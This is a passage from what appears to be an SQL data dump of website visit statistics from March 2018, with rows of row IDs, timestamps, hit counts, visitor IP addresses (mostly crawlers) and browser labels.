66.156','chrome'),(214732,1520107636,1,1,0,0,'66.249.66.76','chrome'),(214733,1520107942,1,1,0,0,'34.204.61.197','other'),(214734,1520108849,1,1,0,0,'34.204.61.197','other'),(214735,1520109128,1,1,0,0,'213.180.203.40','other'),(214736,1520109133,1,0,1,0,'66.249.66.156',''),(214737,1520109395,1,0,1,0,'66.249.66.155',''),(214738,1520109635,1,1,0,0,'8.29.198.26','other'),(214739,1520109765,1,1,0,0,'34.204.61.197','other'),(214740,1520110396,1,0,1,0,'66.249.66.74',''),(214741,1520110496,1,1,0,0,'178.154.171.88','other'),(214742,1520110695,1,1,0,0,'34.204.61.197','other'),(214743,1520110792,1,0,1,0,'66.249.66.155',''),(214744,1520111447,1,1,0,0,'178.154.171.88','other'),(214745,1520111600,1,1,0,0,'34.204.61.197','other'),(214746,1520112525,1,1,0,0,'34.204.61.197','other'),(214747,1520113203,1,1,0,0,'66.249.66.157','chrome'),(214748,1520113206,1,1,0,0,'66.249.66.76','chrome'),(214749,1520113453,1,1,0,0,'34.204.61.197','other'),(214750,1520113563,1,0,1,0,'66.249.66.156',''),(214751,1520115081,1,1,0,0,'141.8.142.74','other'),(214752,1520115472,1,1,0,0,'207.46.13.55','other'),(214753,1520116499,1,0,1,0,'66.249.66.155',''),(214754,1520117145,1,1,0,0,'141.8.142.74','other'),(214755,1520118046,1,1,0,0,'216.244.66.237','other'),(214756,1520118211,1,1,0,0,'66.249.66.157','chrome'),(214757,1520118215,1,1,0,0,'66.249.66.75','chrome'),(214758,1520118405,1,1,0,0,'207.46.13.55','other'),(214759,1520119323,1,1,0,0,'216.244.66.237','other'),(214760,1520119337,1,1,0,0,'87.250.224.46','other'),(214761,1520119554,1,0,1,0,'66.249.66.157',''),(214762,1520120468,1,1,0,0,'8.29.198.25','other'),(214763,1520123592,1,1,0,0,'66.249.66.157','chrome'),(214764,1520123598,1,1,0,0,'66.249.66.76','chrome'),(214765,1520124509,1,0,1,0,'66.249.66.157',''),(214766,1520126346,2,0,2,0,'66.249.66.156',''),(214767,1520126810,1,1,0,0,'157.55.39.38','other'),(214768,1520127203,1,1,0,0,'178.154.171.88','other'),(214769,1520127782,1,1,0,0,'180.76.15.8','other'),(214770,1520128624,1,1,0,0,'216.244.66.237','other'),(214771,1520128630,1,1,0,0,'66.249.66.157','chrome'),(214772,1520128639,1,1,0,0,'66.249.66.76','chrome'),(214773,1520131299,1,1,0,0,'8.29.198.26','other'),(214774,1520132437,1,0,1,0,'66.249.66.157',''),(214775,1520132870,1,1,0,0,'66.249.66.155','chrome'),(214776,1520132873,1,1,0,0,'66.249.66.74','chrome'),(214777,1520133272,1,1,0,0,'54.36.148.217','other'),(214778,1520133335,1,1,0,0,'54.36.148.124','other'),(214779,1520133409,1,0,1,0,'66.249.66.157',''),(214780,1520133581,1,1,0,0,'54.36.148.61','other'),(214781,1520133668,1,1,0,0,'54.36.148.250','other'),(214782,1520133674,1,1,0,0,'54.36.148.173','other'),(214783,1520133840,1,1,0,0,'54.36.149.34','other'),(214784,1520133893,1,1,0,0,'54.36.148.222','other'),(214785,1520133983,1,0,1,0,'66.249.66.155',''),(214786,1520134827,1,1,0,0,'54.36.148.10','other'),(214787,1520134928,1,1,0,0,'54.36.148.31','other'),(214788,1520135106,1,1,0,0,'178.154.171.88','other'),(214789,1520135285,49,49,0,0,'54.37.233.16','other'),(214790,1520135673,1,1,0,0,'54.36.149.26','other'),(214791,1520135690,1,1,0,0,'54.36.148.142','other'),(214792,1520135787,1,1,0,0,'54.36.148.74','other'),(214793,1520135822,1,1,0,0,'54.36.148.70','other'),(214794,1520136491,1,1,0,0,'54.36.148.90','other'),(214795,1520136636,1,1,0,0,'5.9.60.241','other'),(214796,1520136793,1,1,0,0,'54.36.148.194','other'),(214797,1520137003,1,1,0,0,'54.36.148.85','other'),(214798,1520137023,1,1,0,0,'54.36.148.23','other'),(214799,1520137370,2,2,0,0,'141.8.142.74','other'),(214800,1520137405,1,1,0,0,'54.36.149.44','other'),(214801,1520137562,1,1,0,0,'54.36.148.242','other'),(214802,1520137770,1,1,0,0,'54.36.148.119','other'),(214803,1520137947,1,1,0,0,'54.36.148.112','other'),(214804,1520138104,2,1,1,0,'66.249.66.156',''),(214805,1520138107,1,1,0,0,'66.249.66.75','chrome'),(214806,1520138653,1,1,0,0,'141.8.142.74','other'),(214807,1520139021,1,1,0,0,'54.36.148.81','other'),(214808,1520139250,1,1,0,0,'54.36.148.126','other'),(214809,1520139364,1,1,0,0,'54.36.148.18','other'),(214810,1520139588,1,1,0,0,'54.36.148.99','other'),(214811,1520139881,1,1,0,0,'54.36.148.37','other'),(214812,1520139999,1,0,1,0,'66.249.66.157',''),(214813,1520140023,1,1,0,0,'54.36.148.252','other'),(214814,1520140385,1,1,0,0,'216.244.66.237','other'),(214815,1520140887,1,1,0,0,'54.36.148.182','other'),(214816,1520140931,1,1,0,0,'54.36.148.239','other'),(214817,1520141309,1,1,0,0,'54.36.148.212','other'),(214818,1520141666,1,1,0,0,'216.244.66.237','other'),(214819,1520141761,1,1,0,0,'54.36.149.70','other'),(214820,1520141840,1,1,0,0,'54.36.148.120','other'),(214821,1520142135,1,1,0,0,'8.29.198.26','other'),(214822,1520142219,1,1,0,0,'54.36.148.197','other'),(214823,1520142588,1,1,0,0,'54.36.149.43','other'),(214824,1520142619,1,1,0,0,'54.36.148.143','other'),(214825,1520142740,1,1,0,0,'54.36.148.28','other'),(214826,1520143017,1,1,0,0,'54.36.148.254','other'),(214827,1520143102,1,1,0,0,'54.36.149.16','other'),(214828,1520143218,1,1,0,0,'54.36.148.129','other'),(214829,1520143262,1,1,0,0,'54.36.148.72','other'),(214830,1520143276,1,1,0,0,'54.36.148.246','other'),(214831,1520143330,1,1,0,0,'54.36.148.190','other'),(214832,1520143455,1,1,0,0,'54.36.149.99','other'),(214833,1520143671,1,1,0,0,'54.36.148.98','other'),(214834,1520143731,2,1,1,0,'66.249.66.157',''),(214835,1520143740,1,1,0,0,'66.249.66.76','chrome'),(214836,1520143809,1,1,0,0,'54.36.149.91','other'),(214837,1520143925,1,1,0,0,'54.36.148.39','other'),(214838,1520144110,1,1,0,0,'141.8.142.74','other'),(214839,1520144227,1,1,0,0,'54.36.148.234','other'),(214840,1520144295,1,1,0,0,'54.36.148.243','other'),(214841,1520144596,1,1,0,0,'54.36.148.33','other'),(214842,1520144633,1,1,0,0,'95.135.246.114','chrome'),(214843,1520144766,1,1,0,0,'180.76.15.16','other'),(214844,1520144804,1,0,1,0,'66.249.66.157',''),(214845,1520144900,1,1,0,0,'54.36.148.46','other'),(214846,1520144919,1,1,0,0,'54.36.148.104','other'),(214847,1520145030,1,1,0,0,'54.36.148.21','other'),(214848,1520145101,1,0,1,0,'66.249.66.74',''),(214849,1520145238,1,1,0,0,'54.36.148.81','other'),(214850,1520145544,1,1,0,0,'54.36.149.94','other'),(214851,1520145601,1,1,0,0,'54.36.148.176','other'),(214852,1520145678,1,1,0,0,'54.36.149.74','other'),(214853,1520145951,1,1,0,0,'216.244.66.237','other'),(214854,1520146143,1,1,0,0,'54.36.149.95','other'),(214855,1520146338,1,1,0,0,'54.36.148.47','other'),(214856,1520146384,1,1,0,0,'54.36.148.219','other'),(214857,1520146771,1,1,0,0,'54.36.148.30','other'),(214858,1520146910,1,1,0,0,'216.244.66.237','other'),(214859,1520147064,1,1,0,0,'54.36.149.46','other'),(214860,1520147490,1,1,0,0,'66.249.66.157','chrome'),(214861,1520147856,1,1,0,0,'54.36.148.55','other'),(214862,1520148065,1,1,0,0,'54.36.148.173','other'),(214863,1520148335,1,1,0,0,'54.36.149.56','other'),(214864,1520148455,1,1,0,0,'54.36.148.58','other'),(214865,1520148499,1,1,0,0,'54.36.148.131','other'),(214866,1520148563,1,1,0,0,'54.36.149.20','other'),(214867,1520148603,1,1,0,0,'91.196.178.76','chrome'),(214868,1520148795,1,1,0,0,'54.36.148.102','other'),(214869,1520148799,1,1,0,0,'54.36.148.144','other'),(214870,1520148919,1,0,1,0,'66.249.66.156',''),(214871,1520148920,1,1,0,0,'54.36.148.137','other'),(214872,1520148966,1,1,0,0,'66.249.66.76','chrome'),(214873,1520149032,1,1,0,0,'54.36.149.98','other'),(214874,1520149070,1,1,0,0,'54.36.149.1','other'),(214875,1520149091,1,1,0,0,'54.36.148.238','other'),(214876,1520149245,1,1,0,0,'54.36.148.193','other'),(214877,1520149722,1,1,0,0,'54.36.148.84','other'),(214878,1520149859,1,1,0,0,'54.36.149.103','other'),(214879,1520149913,1,1,0,0,'54.36.148.91','other'),(214880,1520149990,1,1,0,0,'54.36.148.110','other'),(214881,1520150167,1,1,0,0,'54.36.149.67','other'),(214882,1520150226,1,1,0,0,'54.36.148.196','other'),(214883,1520150273,1,1,0,0,'54.36.148.25','other'),(214884,1520150605,1,1,0,0,'54.36.148.10','other'),(214885,1520150606,1,1,0,0,'5.9.88.103','other'),(214886,1520150611,1,1,0,0,'54.36.148.53','other'),(214887,1520150962,1,1,0,0,'54.36.149.3','other'),(214888,1520151029,1,1,0,0,'54.36.148.116','other'),(214889,1520151242,1,0,1,0,'66.249.66.155',''),(214890,1520151337,1,1,0,0,'54.36.148.160','other'),(214891,1520151665,1,1,0,0,'54.36.149.89','other'),(214892,1520151976,1,0,1,0,'66.249.66.157',''),(214893,1520152009,1,1,0,0,'54.36.148.112','other'),(214894,1520152213,1,1,0,0,'54.36.149.84','other'),(214895,1520152327,1,1,0,0,'66.249.66.156','chrome'),(214896,1520152395,1,1,0,0,'66.249.66.75','chrome'),(214897,1520152593,1,1,0,0,'54.36.148.27','other'),(214898,1520152971,1,1,0,0,'8.29.198.27','other'),(214899,1520153426,1,0,1,0,'66.249.66.74',''),(214900,1520153666,1,1,0,0,'178.92.8.93','chrome'),(214901,1520153815,1,1,0,0,'217.69.133.222','other'),(214902,1520153844,1,1,0,0,'216.244.66.237','other'),(214903,1520154061,1,1,0,0,'54.36.148.22','other'),(214904,1520154146,1,1,0,0,'54.36.149.78','other'),(214905,1520154389,1,1,0,0,'54.36.148.147','other'),(214906,1520154575,1,1,0,0,'54.36.148.90','other'),(214907,1520154653,1,1,0,0,'54.36.148.61','other'),(214908,1520155105,1,1,0,0,'54.36.149.61','other'),(214909,1520155159,1,1,0,0,'54.36.148.53','other'),(214910,1520155295,1,1,0,0,'54.36.148.103','other'),(214911,1520155297,1,1,0,0,'54.36.148.30','other'),(214912,1520155405,1,1,0,0,'54.36.149.68','other'),(214913,1520155492,1,1,0,0,'54.36.149.74','other'),(214914,1520155575,1,1,0,0,'216.244.66.237','other'),(214915,1520156014,1,1,0,0,'66.249.66.156','chrome'),(214916,1520156095,1,1,0,0,'54.36.149.27','other'),(214917,1520156322,1,1,0,0,'54.36.149.97','other'),(214918,1520156360,1,1,0,0,'54.36.149.38','other'),(214919,1520156648,1,1,0,0,'54.36.149.32','other'),(214920,1520156681,1,1,0,0,'54.36.149.1','other'),(214921,1520156802,1,1,0,0,'54.36.148.240','other'),(214922,1520156842,3,0,3,0,'66.249.66.155',''),(214923,1520157069,1,1,0,0,'54.36.149.86','other'),(214924,1520157200,1,1,0,0,'54.36.149.26','other'),(214925,1520157743,1,1,0,0,'66.249.66.75','chrome'),(214926,1520157747,1,1,0,0,'54.36.149.36','other'),(214927,1520158096,1,1,0,0,'54.36.149.53','other'),(214928,1520158128,1,1,0,0,'54.36.148.137','other'),(214929,1520158147,1,1,0,0,'216.244.66.237','other'),(214930,1520158745,16,16,0,0,'185.126.217.56','other'),(214931,1520158756,10,10,0,0,'185.126.217.56','opera'),(214932,1520158922,1,1,0,0,'54.36.148.223','other'),(214933,1520159052,1,0,1,0,'66.249.66.155',''),(214934,1520159239,1,1,0,0,'54.36.148.10','other'),(214935,1520159974,1,1,0,0,'180.76.15.5','other'),(214936,1520160030,1,1,0,0,'217.69.133.225','other'),(214937,1520160193,1,1,0,0,'54.36.148.62','other'),(214938,1520160272,1,1,0,0,'54.36.148.164','other'),(214939,1520160432,1,1,0,0,'54.36.148.215','other'),(214940,1520160522,1,1,0,0,'54.36.149.2','other'),(214941,1520160557,1,1,0,0,'54.36.149.66','other'),(214942,1520160850,1,1,0,0,'54.36.149.65','other'),(214943,1520160935,1,1,0,0,'40.77.167.10','other'),(214944,1520160994,1,1,0,0,'54.36.148.60','other'),(214945,1520161595,1,1,0,0,'54.36.149.52','other'),(214946,1520161599,1,1,0,0,'66.249.66.155','chrome'),(214947,1520161710,1,1,0,0,'54.36.149.96','other'),(214948,1520161724,1,1,0,0,'54.36.149.30','other'),(214949,1520161730,1,1,0,0,'54.36.148.175','other'),(214950,1520161732,2,1,1,0,'66.249.66.74',''),(214951,1520162546,1,1,0,0,'54.36.148.151','other'),(214952,1520162705,1,1,0,0,'54.36.148.184','other'),(214953,1520162734,1,1,0,0,'54.36.149.87','other'),(214954,1520162949,1,1,0,0,'54.36.148.209','other'),(214955,1520163011,1,1,0,0,'54.36.149.9','other'),(214956,1520163073,1,0,1,0,'66.249.66.155',''),(214957,1520163106,1,0,1,0,'66.249.66.75',''),(214958,1520163234,1,1,0,0,'54.36.149.79','other'),(214959,1520163444,1,1,0,0,'54.36.149.89','other'),(214960,1520163547,1,1,0,0,'54.36.148.88','other'),(214961,1520163571,1,1,0,0,'54.36.149.29','other'),(214962,1520163715,1,1,0,0,'54.36.148.34','other'),(214963,1520163799,1,1,0,0,'8.29.198.27','other'),(214964,1520164115,1,1,0,0,'54.36.149.3','other'),(214965,1520164176,1,0,1,0,'66.249.66.157',''),(214966,1520164810,1,1,0,0,'54.36.148.223','other'),(214967,1520164889,1,1,0,0,'54.36.148.76','other'),(214968,1520165715,1,1,0,0,'54.36.148.11','other'),(214969,1520165716,1,1,0,0,'54.36.149.18','other'),(214970,1520166078,1,1,0,0,'54.36.149.37','other'),(214971,1520166191,1,1,0,0,'54.36.148.117','other'),(214972,1520166279,1,1,0,0,'54.36.148.16','other'),(214973,1520166362,1,1,0,0,'54.36.148.173','other'),(214974,1520166592,1,1,0,0,'54.36.148.86','other'),(214975,1520166827,1,1,0,0,'54.36.149.90','other'),(214976,1520166876,1,1,0,0,'66.249.66.156','chrome'),(214977,1520166899,1,1,0,0,'66.249.66.75','chrome'),(214978,1520167236,1,1,0,0,'54.36.148.54','other'),(214979,1520167677,1,1,0,0,'54.36.149.69','other'),(214980,1520167837,1,0,1,0,'66.249.66.157',''),(214981,1520167864,1,1,0,0,'54.36.148.47','other'),(214982,1520168269,1,1,0,0,'89.64.4.7','chrome'),(214983,1520168446,4,4,0,0,'94.154.239.69','other'),(214984,1520168544,1,1,0,0,'54.36.149.75','other'),(214985,1520168697,1,1,0,0,'207.46.13.32','other'),(214986,1520168703,1,1,0,0,'54.36.148.238','other'),(214987,1520168737,1,1,0,0,'54.36.148.125','other'),(214988,1520169014,1,1,0,0,'54.36.148.193','other'),(214989,1520169018,1,1,0,0,'54.36.148.167','other'),(214990,1520169122,1,1,0,0,'54.36.149.93','other'),(214991,1520169218,1,1,0,0,'54.36.149.14','other'),(214992,1520169459,1,1,0,0,'54.36.149.36','other'),(214993,1520169599,1,0,1,0,'66.249.66.157',''),(214994,1520169680,1,1,0,0,'216.244.66.237','other'),(214995,1520169789,1,1,0,0,'54.36.149.21','other'),(214996,1520169802,1,0,1,0,'66.249.66.156',''),(214997,1520170333,1,0,1,0,'66.249.66.76',''),(214998,1520170753,1,1,0,0,'66.249.66.156','chrome'),(214999,1520170763,1,1,0,0,'66.249.66.76','chrome'),(215000,1520170794,1,1,0,0,'54.36.149.66','other'),(215001,1520171159,1,1,0,0,'54.36.149.12','other'),(215002,1520171351,1,1,0,0,'54.36.149.67','other'),(215003,1520171519,1,1,0,0,'54.36.148.23','other'),(215004,1520171794,1,1,0,0,'216.244.66.237','other'),(215005,1520171924,1,1,0,0,'54.36.148.30','other'),(215006,1520172007,1,1,0,0,'54.36.148.242','other'),(215007,1520172215,1,1,0,0,'54.36.148.77','other'),(215008,1520172269,1,1,0,0,'54.36.149.43','other'),(215009,1520172686,1,1,0,0,'54.36.149.80','other'),(215010,1520172711,2,2,0,0,'91.196.178.12','chrome'),(215011,1520173167,1,1,0,0,'54.36.149.29','other'),(215012,1520173213,1,1,0,0,'54.36.148.140','other'),(215013,1520173278,1,1,0,0,'54.36.148.169','other'),(215014,1520173454,1,1,0,0,'54.36.148.166','other'),(215015,1520173705,1,0,1,0,'66.249.66.157',''),(215016,1520173737,1,1,0,0,'54.36.149.42','other'),(215017,1520173739,1,1,0,0,'54.36.148.70','other'),(215018,1520173966,1,1,0,0,'54.36.148.238','other'),(215019,1520174114,1,1,0,0,'54.36.149.95','other'),(215020,1520174195,1,1,0,0,'54.36.149.64','other'),(215021,1520174329,1,1,0,0,'54.36.148.209','other'),(215022,1520174354,1,1,0,0,'40.77.167.71','other'),(215023,1520174393,1,1,0,0,'54.36.149.89','other'),(215024,1520174638,1,1,0,0,'8.29.198.25','other'),(215025,1520174739,1,1,0,0,'54.36.148.33','other'),(215026,1520174747,1,1,0,0,'54.36.149.68','other'),(215027,1520174832,2,2,0,0,'216.244.66.237','other'),(215028,1520174859,1,1,0,0,'54.36.149.50','other'),(215029,1520174917,1,1,0,0,'141.8.142.74','other'),(215030,1520175073,1,1,0,0,'54.36.148.255','other'),(215031,1520175131,1,1,0,0,'54.36.149.24','other'),(215032,1520175262,1,1,0,0,'54.36.148.23','other'),(215033,1520175273,1,1,0,0,'54.36.149.31','other'),(215034,1520175550,1,1,0,0,'178.154.171.88','other'),(215035,1520175913,1,1,0,0,'66.249.66.157','chrome'),(215036,1520175915,1,1,0,0,'66.249.66.76','chrome'),(215037,1520176139,1,1,0,0,'54.36.149.76','other'),(215038,1520176184,1,1,0,0,'54.36.148.135','other'),(215039,1520176339,1,1,0,0,'54.36.148.179','other'),(215040,1520176554,1,1,0,0,'216.244.66.237','other'),(215041,1520176749,1,1,0,0,'54.36.149.78','other'),(215042,1520176774,2,2,0,0,'91.196.178.35','chrome'),(215043,1520177186,1,1,0,0,'54.36.149.85','other'),(215044,1520177280,1,1,0,0,'54.36.148.48','other'),(215045,1520177352,1,0,1,0,'66.249.66.74',''),(215046,1520177353,1,1,0,0,'54.36.149.95','other'),(215047,1520177425,1,1,0,0,'54.36.148.18','other'),(215048,1520177435,1,1,0,0,'54.36.148.40','other'),(215049,1520177471,1,1,0,0,'40.77.167.71','other'),(215050,1520177718,1,1,0,0,'54.36.148.212','other'),(215051,1520177823,1,1,0,0,'54.36.149.88','other'),(215052,1520177904,1,1,0,0,'54.36.148.13','other'),(215053,1520177966,1,1,0,0,'54.36.149.74','other'),(215054,1520178124,1,1,0,0,'54.36.148.160','other'),(215055,1520178297,1,1,0,0,'216.244.66.237','other'),(215056,1520178698,1,1,0,0,'54.36.148.243','other'),(215057,1520178728,1,1,0,0,'54.36.149.10','other'),(215058,1520178813,1,0,1,0,'66.249.66.157',''),(215059,1520179177,1,1,0,0,'54.36.149.35','other'),(215060,1520179398,1,1,0,0,'54.36.149.7','other'),(215061,1520179409,1,0,1,0,'66.249.66.155',''),(215062,1520179464,1,1,0,0,'91.196.178.54','chrome'),(215063,1520179642,1,1,0,0,'54.36.149.71','other'),(215064,1520179810,1,1,0,0,'54.36.148.135','other'),(215065,1520179933,1,1,0,0,'54.36.149.37','other'),(215066,1520180333,1,1,0,0,'54.36.148.207','other'),(215067,1520180574,1,1,0,0,'54.36.148.177','other'),(215068,1520180611,1,1,0,0,'91.196.178.79','chrome'),(215069,1520180615,1,1,0,0,'54.36.149.48','other'),(215070,1520180682,1,0,1,0,'66.249.66.157',''),(215071,1520180771,1,0,1,0,'66.249.66.74',''),(215072,1520180902,1,1,0,0,'54.36.149.23','other'),(215073,1520181218,1,1,0,0,'66.249.66.156','chrome'),(215074,1520181221,1,1,0,0,'66.249.66.74','chrome'),(215075,1520181249,1,1,0,0,'54.36.148.20','other'),(215076,1520181445,1,1,0,0,'54.36.149.16','other'),(215077,1520181456,1,1,0,0,'54.36.148.235','other'),(215078,1520181639,1,1,0,0,'54.36.148.203','other'),(215079,1520181660,1,1,0,0,'54.36.149.101','other'),(215080,1520181675,1,1,0,0,'54.36.148.88','other'),(215081,1520181703,1,0,1,0,'66.249.66.155',''),(215082,1520181767,1,1,0,0,'54.36.148.178','other'),(215083,1520182095,1,1,0,0,'40.77.167.71','other'),(215084,1520182317,1,1,0,0,'54.36.148.43','other'),(215085,1520182666,1,1,0,0,'54.36.148.29','other'),(215086,1520182679,2,2,0,0,'54.36.148.178','other'),(215087,1520182850,1,1,0,0,'54.36.148.130','other'),(215088,1520182952,1,1,0,0,'54.36.149.45','other'),(215089,1520183025,1,1,0,0,'54.36.148.155','other'),(215090,1520183708,1,1,0,0,'130.180.209.157','chrome'),(215091,1520183757,1,1,0,0,'93.73.80.121','chrome'),(215092,1520183765,1,1,0,0,'54.36.148.201','other'),(215093,1520183813,1,1,0,0,'54.36.148.182','other'),(215094,1520184212,1,1,0,0,'216.244.66.237','other'),(215095,1520184509,1,1,0,0,'54.36.149.101','other'),(215096,1520184754,1,1,0,0,'66.249.66.157','chrome'),(215097,1520184756,1,1,0,0,'66.249.66.74','chrome'),(215098,1520184925,1,1,0,0,'54.36.149.10','other'),(215099,1520185003,1,1,0,0,'54.36.148.77','other'),(215100,1520185141,1,1,0,0,'54.36.148.148','other'),(215101,1520185254,1,1,0,0,'54.36.148.245','other'),(215102,1520185280,1,1,0,0,'54.36.148.220','other'),(215103,1520185325,1,1,0,0,'54.36.149.50','other'),(215104,1520185479,1,1,0,0,'8.29.198.26','other'),(215105,1520185542,1,1,0,0,'54.36.148.236','other'),(215106,1520185546,1,1,0,0,'54.36.148.101','other'),(215107,1520185690,1,0,1,0,'66.249.66.155',''),(215108,1520185765,1,1,0,0,'54.36.149.103','other'),(215109,1520185917,1,1,0,0,'54.36.149.105','other'),(215110,1520186029,1,1,0,0,'54.36.148.64','other'),(215111,1520186388,1,1,0,0,'54.36.149.106','other'),(215112,1520186392,1,1,0,0,'54.36.149.6','other'),(215113,1520187148,1,1,0,0,'180.76.15.32','other'),(215114,1520187409,1,1,0,0,'185.29.253.99','chrome'),(215115,1520187692,1,1,0,0,'54.36.149.8','other'),(215116,1520187881,1,1,0,0,'54.36.148.75','other'),(215117,1520188572,1,0,1,0,'66.249.66.155',''),(215118,1520188909,1,1,0,0,'54.36.148.24','other'),(215119,1520189177,1,1,0,0,'54.36.149.33','other'),(215120,1520189633,1,0,1,0,'66.249.66.157',''),(215121,1520189671,1,1,0,0,'40.77.167.109','other'),(215122,1520189850,1,1,0,0,'54.36.148.107','other'),(215123,1520189953,1,0,1,0,'66.249.66.156',''),(215124,1520190037,1,1,0,0,'54.36.148.253','other'),(215125,1520190052,1,0,1,0,'66.249.66.74',''),(215126,1520190145,1,1,0,0,'54.36.149.86','other'),(215127,1520190168,1,1,0,0,'54.36.148.21','other'),(215128,1520190205,1,1,0,0,'54.36.148.200','other'),(215129,1520190446,1,1,0,0,'66.249.66.155','chrome'),(215130,1520190448,1,1,0,0,'66.249.66.76','chrome'),(215131,1520190916,1,1,0,0,'141.8.142.74','other'),(215132,1520190934,1,1,0,0,'212.83.178.172','chrome'),(215133,1520190995,1,1,0,0,'54.36.148.58','other'),(215134,1520191029,2,2,0,0,'216.244.66.237','other'),(215135,1520191178,1,1,0,0,'54.36.148.194','other'),(215136,1520191292,1,1,0,0,'54.36.148.43','other'),(215137,1520192163,1,1,0,0,'54.36.148.16','other'),(215138,1520192172,1,1,0,0,'141.8.142.74','other'),(215139,1520192555,1,1,0,0,'54.36.148.183','other'),(215140,1520192655,1,1,0,0,'54.36.148.76','other'),(215141,1520193019,1,1,0,0,'54.36.149.17','other'),(215142,1520193194,1,1,0,0,'54.36.148.202','other'),(215143,1520193207,1,1,0,0,'54.36.148.161','other'),(215144,1520193236,1,1,0,0,'54.36.148.90','other'),(215145,1520193365,1,0,1,0,'66.249.66.157',''),(215146,1520193425,1,1,0,0,'54.36.148.131','other'),(215147,1520193875,1,1,0,0,'40.77.167.109','other'),(215148,1520193934,1,1,0,0,'66.249.66.155','chrome'),(215149,1520193937,1,1,0,0,'66.249.66.76','chrome'),(215150,1520194047,1,1,0,0,'54.36.148.106','other'),(215151,1520194374,1,1,0,0,'54.36.148.182','other'),(215152,1520194539,1,1,0,0,'54.36.148.87','other'),(215153,1520195127,1,1,0,0,'54.36.148.91','other'),(215154,1520195476,1,1,0,0,'54.36.148.13','other'),(215155,1520196027,1,1,0,0,'54.36.148.129','other'),(215156,1520196120,1,1,0,0,'54.36.148.131','other'),(215157,1520196326,1,1,0,0,'8.29.198.25','other'),(215158,1520196711,1,1,0,0,'54.36.149.38','other'),(215159,1520196831,1,1,0,0,'54.36.149.80','other'),(215160,1520196876,1,1,0,0,'54.36.148.155','other'),(215161,1520196904,1,1,0,0,'40.77.167.109','other'),(215162,1520196909,1,1,0,0,'141.8.132.19','other'),(215163,1520196925,2,1,1,0,'66.249.66.156',''),(215164,1520196979,1,1,0,0,'141.8.142.74','other'),(215165,1520196983,1,1,0,0,'178.154.171.88','other'),(215166,1520197070,1,0,1,0,'66.249.66.74',''),(215167,1520197434,1,1,0,0,'54.36.148.87','other'),(215168,1520197460,1,1,0,0,'54.36.148.46','other'),(215169,1520197467,1,1,0,0,'54.36.149.33','other'),(215170,1520197531,1,1,0,0,'54.36.148.101','other'),(215171,1520197859,1,1,0,0,'54.36.148.209','other'),(215172,1520197910,1,0,1,0,'66.249.66.157',''),(215173,1520197931,1,1,0,0,'54.36.149.17','other'),(215174,1520198353,1,1,0,0,'54.36.148.204','other'),(215175,1520198390,1,1,0,0,'54.36.148.202','other'),(215176,1520198508,1,1,0,0,'54.36.149.79','other'),(215177,1520198512,1,1,0,0,'54.36.148.252','other'),(215178,1520198581,1,0,1,0,'66.249.66.155',''),(215179,1520198735,1,0,1,0,'66.249.66.76',''),(215180,1520198867,1,1,0,0,'54.36.148.165','other'),(215181,1520198871,1,1,0,0,'54.36.148.134','other'),(215182,1520199010,1,1,0,0,'54.36.148.224','other'),(215183,1520199021,1,1,0,0,'54.36.148.232','other'),(215184,1520199340,1,1,0,0,'66.249.66.155','chrome'),(215185,1520199346,1,1,0,0,'66.249.66.76','chrome'),(215186,1520199646,1,1,0,0,'216.244.66.237','other'),(215187,1520199693,1,1,0,0,'54.36.149.31','other'),(215188,1520199813,1,1,0,0,'40.77.167.69','other'),(215189,1520199857,2,2,0,0,'141.8.142.74','other'),(215190,1520199880,1,1,0,0,'54.36.148.153','other'),(215191,1520199977,1,1,0,0,'13.250.204.171','chrome'),(215192,1520200016,1,1,0,0,'54.36.148.211','other'),(215193,1520200297,1,1,0,0,'54.36.148.123','other'),(215194,1520200483,1,1,0,0,'54.36.148.37','other'),(215195,1520200697,1,1,0,0,'54.36.148.227','other'),(215196,1520200946,1,1,0,0,'54.36.148.156','other'),(215197,1520201110,1,1,0,0,'54.36.148.253','other'),(215198,1520201239,1,1,0,0,'54.36.148.208','other'),(215199,1520201287,1,1,0,0,'13.250.204.171','other'),(215200,1520201352,1,1,0,0,'54.36.148.184','other'),(215201,1520201414,1,1,0,0,'54.36.148.36','other'),(215202,1520201515,1,1,0,0,'54.36.149.94','other'),(215203,1520201614,1,1,0,0,'54.36.148.252','other'),(215204,1520201619,1,1,0,0,'54.36.149.106','other'),(215205,1520201882,1,1,0,0,'54.36.149.74','other'),(215206,1520201996,1,1,0,0,'94.180.194.126','chrome'),(215207,1520202137,1,1,0,0,'216.244.66.237','other'),(215208,1520202252,1,1,0,0,'40.77.167.109','other'),(215209,1520202451,1,1,0,0,'54.36.148.178','other'),(215210,1520202476,1,1,0,0,'141.8.142.74','other'),(215211,1520202523,1,1,0,0,'54.36.149.13','other'),(215212,1520202531,1,1,0,0,'54.36.148.35','other'),(215213,1520202685,2,2,0,0,'54.36.148.237','other'),(215214,1520202893,1,1,0,0,'54.36.149.24','other'),(215215,1520203164,1,1,0,0,'54.36.148.38','other'),(215216,1520203172,1,1,0,0,'54.36.149.18','other'),(215217,1520203218,1,1,0,0,'54.36.148.143','other'),(215218,1520203233,1,1,0,0,'54.36.148.248','other'),(215219,1520203369,4,4,0,0,'18.196.196.135','other'),(215220,1520203389,1,1,0,0,'54.36.149.67','other'),(215221,1520204072,1,1,0,0,'54.36.148.125','other'),(215222,1520204276,1,1,0,0,'54.36.149.49','other'),(215223,1520204538,2,2,0,0,'103.43.93.26','firefox'),(215224,1520204572,1,1,0,0,'207.46.13.165','other'),(215225,1520204599,1,1,0,0,'54.36.148.126','other'),(215226,1520204628,1,1,0,0,'54.36.149.64','other'),(215227,1520204813,1,1,0,0,'54.36.148.106','other'),(215228,1520205604,1,1,0,0,'54.36.149.30','other'),(215229,1520205641,1,1,0,0,'54.36.149.23','other'),(215230,1520205787,1,1,0,0,'54.36.149.67','other'),(215231,1520206458,1,1,0,0,'207.46.13.165','other'),(215232,1520206592,1,1,0,0,'54.36.148.109','other'),(215233,1520206974,1,1,0,0,'54.36.148.225','other'),(215234,1520207167,1,1,0,0,'8.29.198.25','other'),(215235,1520207221,1,1,0,0,'54.36.148.123','other'),(215236,1520207782,1,1,0,0,'54.36.148.151','other'),(215237,1520208015,1,0,1,0,'66.249.66.157',''),(215238,1520208095,1,1,0,0,'54.36.148.238','other'),(215239,1520208105,1,0,1,0,'66.249.66.155',''),(215240,1520208254,1,1,0,0,'128.74.244.153','msie'),(215241,1520208257,1,1,0,0,'54.36.149.86','other'),(215242,1520208381,1,0,1,0,'66.249.66.76',''),(215243,1520208456,1,1,0,0,'66.249.66.156','chrome'),(215244,1520208462,1,1,0,0,'66.249.66.76','chrome'),(215245,1520208855,1,1,0,0,'54.36.148.75','other'),(215246,1520208866,2,2,0,0,'216.244.66.237','other'),